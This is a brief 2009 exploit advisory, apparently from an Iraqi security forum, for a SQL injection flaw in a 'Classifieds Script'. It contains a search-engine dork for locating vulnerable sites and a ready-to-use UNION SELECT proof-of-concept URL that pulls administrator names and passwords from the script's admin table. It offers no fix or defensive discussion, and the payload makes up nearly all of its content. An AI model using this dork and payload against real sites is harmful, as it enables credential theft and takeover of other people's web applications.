Classifieds Script type Remote SQL Injection Vulnerability.pdf

1 Classifieds Script (type) Remote SQL Injection Vulnerability 2 3 | Author: Hussin X 4 | 5 | Home : www.iq−ty.com<http://www.iq−ty.com> 6 | 7 | email: darkangel_g85[at]Yahoo[DoT]com 8 | d0rk : inurl:"showcategory.php?type" 9 10 11 POC : 12 13 http://[server]/showcategory.php?type=6&cid=−1+union+select+1,unhex(hex(concat(admin_name,0x3e,pwd))),3,4,5+from+free tplbanners_admin−− 14 15 16 #end 17 18 IQ−SecuritY FoRuM Page 1/1 Classifieds Script type Remote SQL Injection Vulnerability Hussin X 12/30/2009